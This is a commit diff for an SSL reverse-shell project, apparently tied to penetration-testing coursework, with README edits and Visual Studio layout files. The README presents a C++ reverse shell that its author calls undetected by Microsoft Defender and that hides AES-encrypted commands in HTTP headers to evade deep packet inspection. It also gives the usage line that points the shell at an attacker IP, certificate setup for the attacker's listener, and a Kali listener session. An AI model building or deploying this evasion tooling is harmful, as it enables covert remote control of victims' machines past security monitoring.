V-i-x-x · Nov 24, 2024
diff --git a/‎Readme.md
+20-9 b/‎Readme.md
+20-9
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/440de348-7565-4c2a-be05-aa58deaad8f4.vsidx
-6.68 KB b/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/440de348-7565-4c2a-be05-aa58deaad8f4.vsidx
-6.68 KB
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/5fd72b21-f278-4443-80e1-21b3a12e2579.vsidx
-107 Bytes b/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/5fd72b21-f278-4443-80e1-21b3a12e2579.vsidx
-107 Bytes
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/bda00eff-df27-43f9-94e5-5b9ff666d46b.vsidx
26.3 KB b/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/bda00eff-df27-43f9-94e5-5b9ff666d46b.vsidx
26.3 KB
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/d8cfec88-5dc4-4c0b-b3b5-ac4b1400c507.vsidx
-107 Bytes b/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/d8cfec88-5dc4-4c0b-b3b5-ac4b1400c507.vsidx
-107 Bytes
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/5294c605-c685-4073-87bc-3a8fe82a2176.vsidx ‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/fc7a23c9-3027-43be-9564-5adb955bc352.vsidx b/‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/5294c605-c685-4073-87bc-3a8fe82a2176.vsidx ‎SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/fc7a23c9-3027-43be-9564-5adb955bc352.vsidx
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/v17/.suo
11 KB b/‎SSLReverseShell/.vs/SSLReverseShell/v17/.suo
11 KB
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/v17/Browse.VC.db
520 KB b/‎SSLReverseShell/.vs/SSLReverseShell/v17/Browse.VC.db
520 KB
diff --git a/‎SSLReverseShell/.vs/SSLReverseShell/v17/DocumentLayout.backup.json
+38-6 b/‎SSLReverseShell/.vs/SSLReverseShell/v17/DocumentLayout.backup.json
+38-6
@@ -13,8 +13,9 @@ An encrypted reverse shell helps evade such detection by:
 2. Using SSL to blend in with legitimate HTTPS traffic.
 
 To address this gap, I created a simple **C++ SSL Reverse Shell** POC (commented and explained):
-- **Undetectable** by Microsoft Defender and some other AV solutions at the time of publishing.
+- **Undetected** by Microsoft Defender and some other AV solutions at the time of publishing.
 - Enables secure communication via SSL, reducing the chance of detection.
+- Using AES Encryption / Decryption and embedding the results and commands within HTTP headers to bypass deep packet inspection
 
 > **Note**: I tested the binary against a limited set of antivirus solutions, and results may vary across environments.
 
@@ -70,21 +71,31 @@ C:\OpenSSLWin64\install\lib\libcrypto.lib
 
 ![Local Image](./images/Linker2.png "Linker.png")
 
+---
+## Usage
+
+```
+.\SSLReverseShell.exe 192.168.33.146 443
+```
+
+---
+## POC
+
+This C++ Project will connect to the python server and initiate a ssl connection, taking commands from the server (attacker) and sending the results to the attacker through ssl tunnel encrypted with aes.
+
 ---
 
 ## Capture the reverse shell in your Kali OS
 
 1- Generate a New RSA Private Key and Self-Signed Certificate (Containing the Public Key)
-```
+
 openssl req -newkey rsa:2048 -nodes -keyout attacker.key -x509 -days 365 -out attacker.crt
+
+2- Python Script will be the server to capture the shell and send the command back to client (encrypted with aes)
 ```
-2- Combine the Private Key and Certificate into a PEM File
-```
-cat attacker.crt attacker.key > attacker.pem
-```
-3- Start an OpenSSL SSL Server on Port 443
-```
-openssl s_server -accept 443 -cert attacker.crt -key attacker.key -cipher ALL -quiet
+┌──(kali㉿kali)-[~/Desktop/pen-300/sslrevshell]
+└─$ python3 sslserverv1.3.py      
+[*] Listening on 0.0.0.0:443
 ```
 ---
 
 
@@ -1,11 +1,19 @@
 {
   "Version": 1,
-  "WorkspaceRootPath": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\Extras Advanced\\SSLReverseShell\\",
+  "WorkspaceRootPath": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\",
   "Documents": [
     {
-      "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\Extras Advanced\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
       "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\SSLReverseShell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
     },
+    {
+      "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\AES_CBC.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\AES_CBC.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
     {
       "AbsoluteMoniker": "D:0:0:{A2FE74E1-B743-11D0-AE1A-00A0C90FFFC3}|\u003CMiscFiles\u003E|C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
     }
@@ -17,11 +25,35 @@
       "DocumentGroups": [
         {
           "DockedWidth": 200,
-          "SelectedChildIndex": 1,
+          "SelectedChildIndex": 3,
           "Children": [
+            {
+              "$type": "Document",
+              "DocumentIndex": 2,
+              "Title": "AES_CBC.h",
+              "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h",
+              "RelativeDocumentMoniker": "SSLReverseShell\\AES_CBC.h",
+              "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h",
+              "RelativeToolTip": "SSLReverseShell\\AES_CBC.h",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAgAAAAfAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
+              "WhenOpened": "2024-11-24T15:13:33.656Z"
+            },
             {
               "$type": "Document",
               "DocumentIndex": 1,
+              "Title": "AES_CBC.cpp",
+              "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp",
+              "RelativeDocumentMoniker": "SSLReverseShell\\AES_CBC.cpp",
+              "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp",
+              "RelativeToolTip": "SSLReverseShell\\AES_CBC.cpp",
+              "ViewState": "AgIAADsAAAAAAAAAAAAIwFIAAAAwAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2024-11-24T15:13:29.346Z"
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 3,
               "Title": "apiset.h",
               "DocumentMoniker": "C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
               "RelativeDocumentMoniker": "..\\..\\..\\..\\..\\..\\..\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
@@ -35,11 +67,11 @@
               "$type": "Document",
               "DocumentIndex": 0,
               "Title": "SSLReverseShell.cpp",
-              "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\Extras Advanced\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
+              "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
               "RelativeDocumentMoniker": "SSLReverseShell\\SSLReverseShell.cpp",
-              "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\Extras Advanced\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
+              "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
               "RelativeToolTip": "SSLReverseShell\\SSLReverseShell.cpp",
-              "ViewState": "AgIAACYAAAAAAAAAAAAAACsAAAAAAAAAAAAAAA==",
+              "ViewState": "AgIAAEsAAAAAAAAAAADwv1wAAAAKAAAAAAAAAA==",
               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
               "WhenOpened": "2024-09-26T08:45:51.878Z",
               "EditorCaption": ""